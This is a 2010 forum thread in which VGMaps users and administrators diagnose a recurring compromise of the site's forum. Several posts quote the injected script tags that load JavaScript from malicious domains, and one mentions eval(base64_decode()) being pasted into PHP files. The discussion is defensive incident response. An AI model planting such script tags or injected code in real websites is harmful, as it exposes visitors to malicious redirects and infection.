VGMaps
Site Boards => Message Board Help => Topic started by: Wario Bros on May 02, 2010, 11:37:17 am
-
When on get on this forums, my anti virus program keeps making a pop-up saying there is a virus threat called "HTML/ScrInject.B.Gen virus." I tell it to delete it but when I click on another section of the forums, that same warning message comes up. Is this just me or is it happening to someone else as well?
-
What page is doing this?
-
All of them. I just sent you a PM about this.
-
Hmm. At the very end of every page, after the </html> tag, is the following:
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
which redirects to http://www3.workfree36-td.xorg.pl based on your cookies. This domain times out on me, so I can't tell what it is.
EDIT: The kdjkfjskdfjlskdjf.com site is timing out for me now, so every page on the forums tries to load forever.
-
Either my AntiVirus is disabling it or IE8 is. I am not having any issues with the site, but I do see the code. Working on it now. Seems like it is embeded in the code.
-
The script only does something the first time you view it. It adds a cookie, then sends you to the other site. From then on it sees that you have a cookie already and does nothing
The real question is how this is happening in the first place. It's not being appended with JavaScript, because it's there even if I get the page with plain old wget. This sounds almost like they somehow edited the site's PHP source :-S
EDIT: Alright, everyone is safe. The site it redirects you to further redirects you to "QoogleSearch.com", which has been de-listed:
Domain Name: QOOGLESEARCH.COM
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
Status: ok
Updated Date: 27-apr-2010
Creation Date: 21-jan-2010
Expiration Date: 21-jan-2011
-
That's the infection I was talking about. And it looks like the script is still there at the bottom of the page. The site gives you a virus, or it did before it was shut down.
-
I overwrote the source code with the original files, hence the current lack of ads at the footer. No luck in removing it though. Currently creating a new directory with a completely fresh install, importing the DB now.
EDIT: Ok, everything is switched over to a completely fresh install with the old DB imported in. Anyone see anything off? Let me know.
-
That's good to hear! BTW, I no longer get that virus message anymore. I'm kinda surprised how fast this was handled. :)
-
Did you save the infected files for further inspection? This might just happen again if you don't find the cause.
-
Doesn't seem fast to me... 4 hours of trying stuff just to let it come down to a fresh install. Still will be looking at the old files to see if I can't find what was changed in case it happens again.
EDIT: We are thinking the same.
-
If you have any files or directories that are world-writeable then other people on your shared server (http://www.yougetsignal.com/tools/web-sites-on-web-server/) can drop files or add exploits. Also, any vulnerabilities in the forum will get you targeted, the best mitigation being to make some non-standard modifications (e.g. moving form fields around, hiding the version number) to make it harder to script and/or Google for.
(I've had to deal with these kinds of problems for a while... the only real solution is to run custom software, on a private server, and either not be big enough to get targeted or have really robust software. Also, daily backups of the files and DB.)
-
Also, some of the attachments/avatars have been corrupted. My avatar has had two bytes removed, for example.
-
Sorry Maxim. It doesn't look like I can do anything about the avatars. You'll have to reload it back up.
-
Not that avatars are a chief concern, but don't you have backups? My avatar and several others' have disappeared, and it makes me concerned that other things might be corrupted.
-
Unless you've reuploaded it, I can see yours just fine.
It seems almost all of the attachments in the Platinum thread are corrupted, so I'm wondering if it didn't corrupt almost all images.
-
Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.
-
I recently backed up the attachments (a few days ago - but don't think that's related - or at least I hope not), so shouldn't reuploading the contents of the "attachments" folder fix them? When I get home I'll give that a shot.
Though I'm more concerned about something more critical or irreplaceable being corrupted, and if whatever's causing the corruption is still around.
-
Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.
Oh, NOW it's broken. I hate the way this browser uses its cache.
-
As long as the site is on a shared server, the possibility of this happening again is always going to exist. And its not a matter of forum software, just a matter of root security. The problem was that a script pasted eval(base64(decode()) into every page in the forum. I'm surprised it didn't go higher into the main site, but it may have just been targeting the forum itself.
-
It has happened again :(
-
The bottom of the page contains:
<script src="http://holasionweb.com/oo.php"></script>
...which serves some javascript that uses a cookie to redirect once to suitcase52td.net which is totally blocked for me...
-
Fixed
-
Danger: AVG Active Surf-Shield has detected active threats on this page and has blocked access for your protection.
The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.
URL: losotrana.com/js.php
Name: Virus found JS/Redir
That's what I'm getting now.
-
Same thing for me. Every page on the forum causes Avast to report that trojan horse...
-
I'm of the opinion that the problem isn't that this site is on a shared server, but that something is attacking externally. None of this was happening until the captcha was changed, and only the forums are targeted. If the server admins are worth anything they keep each site in private directories.
[EDIT] Nevermind, it appears that it definitely is a problem with GoDaddy. Lots (http://wordpress.org/support/topic/394255) of other people with different software are experiencing this. I guess we'll just have to wait it out.
Just a thought -- if the base64_decode command is getting pasted at the very end of the php file, what if you (bustin98) just stick an exit() at the end? That way anything after that point will be ignored, should this happen again.
-
Its at the beginning of the file. Wish there was something I could put in to kill it. I changed permissions on the files but that didn't do a thing, and it wouldn't if the source was above the basic web user. Need to just get off the shared server, or on one that has better security.
-
Well, did a deep cleaning of the site, found a random file that may be the cause or a cause the infection. Got rid of it. I also renamed the cookie name, so sorry about causing everyone to have to log back in... :D Seems the infection is self replicating and all it had to do is get in once. Every time someone hit an infected page, it ran through the site and added the code if it didn't already exist.
Maybe now things can go back to normal.??
-
It's happened again. The following script has been added to the forum code.
<script src="http://myblindstudioinfoonline.com/ll.php"></script>
Those without reliable virus protection beware.
-
Uh oh. For some reason, I'm not getting any kind of warning and nothing is happening. I hope this gets taken care of before something does.
-
Should be good now.